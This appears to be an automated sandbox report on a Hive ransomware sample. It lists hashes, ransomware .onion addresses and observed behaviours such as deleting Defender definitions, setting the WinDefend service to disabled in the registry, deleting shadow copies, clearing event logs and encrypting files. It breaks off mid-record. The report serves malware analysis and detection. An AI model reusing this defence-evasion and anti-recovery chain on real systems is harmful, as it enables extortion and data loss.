Analysis
-
max time kernel
234s -
max time network
181s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 14:34
Static task
static1
Behavioral task
behavioral1
Sample
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Resource
win7-en-20211208
General
-
Target
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
-
Size
3.8MB
-
MD5
3ef03bfba1665597a824e136fad174de
-
SHA1
b0e02886ca9c7edce20380934f78fa8e5bb931b9
-
SHA256
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8
-
SHA512
3773754a433e885db06484ce9b4a4ff3936de153f2954c0c4c4487148fa28f8947ec2eef756f09b408fb1ca3472d8798757ee418a1e5a671ef3a0a924c364309
Malware Config
Extracted
C:\wPfq_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3304 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2180 bcdedit.exe 2348 bcdedit.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exedescription ioc process File renamed C:\Users\Admin\Pictures\ReceiveSkip.png => C:\Users\Admin\Pictures\ReceiveSkip.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\ReceiveSkip.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\UpdateDismount.raw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_MAAAADAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File renamed C:\Users\Admin\Pictures\ConvertToLock.tif => C:\Users\Admin\Pictures\ConvertToLock.tif.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\ConvertToLock.tif.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File renamed C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_CgAAAAoAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\FormatSplit.crw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_CgAAAAoAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File renamed C:\Users\Admin\Pictures\SyncExport.tiff => C:\Users\Admin\Pictures\SyncExport.tiff.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\SyncExport.tiff.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File renamed C:\Users\Admin\Pictures\UpdateDismount.raw => C:\Users\Admin\Pictures\UpdateDismount.raw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_MAAAADAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART9.BDR.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7336_40x40x32.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\fue_3_1.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-disabled.svg.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AgAAAAIAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\.lastModified.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_NgAAADYAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\powerview.x-none.msi.16.x-none.vreg.dat.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\fi_60x42.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-80_altform-unplated_contrast-white.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarMediumTile.scale-125.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_FgAAABYAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_EgAAABIAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\ja-JP\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\SmallTile.scale-200.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-150.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_EAAAABAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Sounds\StarsFlying_D.wav afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\178.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionMedTile.scale-400.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\plugin.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_DAAAAAwAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\Emboss.scale-100.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Folder.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\UpsellContentDialogHeader.jpg afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\4774_24x24x32.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.contrast-black_scale-100.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W3.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\ribbon.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\Functions.fx afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cc_16x11.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_BgAAAAYAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_OEM_Perp-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\02.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7656_24x24x32.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-40_altform-unplated.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_DAAAAAwAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019DemoR_BypassTrial180-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_KgAAACoAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderWideTile.contrast-black_scale-125.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100_contrast-white.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxWideTile.scale-200.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AgAAAAIAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\TellMeWord.nrr.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\cw_60x42.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\LargeTile.scale-200.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_JgAAACYAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-phn.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\whew.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2380 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exeafd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exepid process 1656 powershell.exe 1656 powershell.exe 1656 powershell.exe 1916 powershell.exe 1916 powershell.exe 1916 powershell.exe 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1420 wevtutil.exe Token: SeBackupPrivilege 1420 wevtutil.exe Token: SeSecurityPrivilege 2056 wevtutil.exe Token: SeBackupPrivilege 2056 wevtutil.exe Token: SeSecurityPrivilege 3180 wevtutil.exe Token: SeBackupPrivilege 3180 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4004 wmic.exe Token: SeSecurityPrivilege 4004 wmic.exe Token: SeTakeOwnershipPrivilege 4004 wmic.exe Token: SeLoadDriverPrivilege 4004 wmic.exe Token: SeSystemProfilePrivilege 4004 wmic.exe Token: SeSystemtimePrivilege 4004 wmic.exe Token: SeProfSingleProcessPrivilege 4004 wmic.exe Token: SeIncBasePriorityPrivilege 4004 wmic.exe Token: SeCreatePagefilePrivilege 4004 wmic.exe Token: SeBackupPrivilege 4004 wmic.exe Token: SeRestorePrivilege 4004 wmic.exe Token: SeShutdownPrivilege 4004 wmic.exe Token: SeDebugPrivilege 4004 wmic.exe Token: SeSystemEnvironmentPrivilege 4004 wmic.exe Token: SeRemoteShutdownPrivilege 4004 wmic.exe Token: SeUndockPrivilege 4004 wmic.exe Token: SeManageVolumePrivilege 4004 wmic.exe Token: 33 4004 wmic.exe Token: 34 4004 wmic.exe Token: 35 4004 wmic.exe Token: 36 4004 wmic.exe Token: SeIncreaseQuotaPrivilege 2320 wmic.exe Token: SeSecurityPrivilege 2320 wmic.exe Token: SeTakeOwnershipPrivilege 2320 wmic.exe Token: SeLoadDriverPrivilege 2320 wmic.exe Token: SeSystemProfilePrivilege 2320 wmic.exe Token: SeSystemtimePrivilege 2320 wmic.exe Token: SeProfSingleProcessPrivilege 2320 wmic.exe Token: SeIncBasePriorityPrivilege 2320 wmic.exe Token: SeCreatePagefilePrivilege 2320 wmic.exe Token: SeBackupPrivilege 2320 wmic.exe Token: SeRestorePrivilege 2320 wmic.exe Token: SeShutdownPrivilege 2320 wmic.exe Token: SeDebugPrivilege 2320 wmic.exe Token: SeSystemEnvironmentPrivilege 2320 wmic.exe Token: SeRemoteShutdownPrivilege 2320 wmic.exe Token: SeUndockPrivilege 2320 wmic.exe Token: SeManageVolumePrivilege 2320 wmic.exe Token: 33 2320 wmic.exe Token: 34 2320 wmic.exe Token: 35 2320 wmic.exe Token: 36 2320 wmic.exe Token: SeIncreaseQuotaPrivilege 2320 wmic.exe Token: SeSecurityPrivilege 2320 wmic.exe Token: SeTakeOwnershipPrivilege 2320 wmic.exe Token: SeLoadDriverPrivilege 2320 wmic.exe Token: SeSystemProfilePrivilege 2320 wmic.exe Token: SeSystemtimePrivilege 2320 wmic.exe Token: SeProfSingleProcessPrivilege 2320 wmic.exe Token: SeIncBasePriorityPrivilege 2320 wmic.exe Token: SeCreatePagefilePrivilege 2320 wmic.exe Token: SeBackupPrivilege 2320 wmic.exe Token: SeRestorePrivilege 2320 wmic.exe Token: SeShutdownPrivilege 2320 wmic.exe Token: SeDebugPrivilege 2320 wmic.exe Token: SeSystemEnvironmentPrivilege 2320 wmic.exe Token: SeRemoteShutdownPrivilege 2320 wmic.exe Token: SeUndockPrivilege 2320 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2788 wrote to memory of 1872 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 1872 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1872 wrote to memory of 1284 1872 net.exe net1.exe PID 1872 wrote to memory of 1284 1872 net.exe net1.exe PID 2788 wrote to memory of 3024 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 2788 wrote to memory of 3024 2788 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 3024 wrote to memory of 2784 3024 net.exe net1.exe PID 3024 wrote to memory of 2784 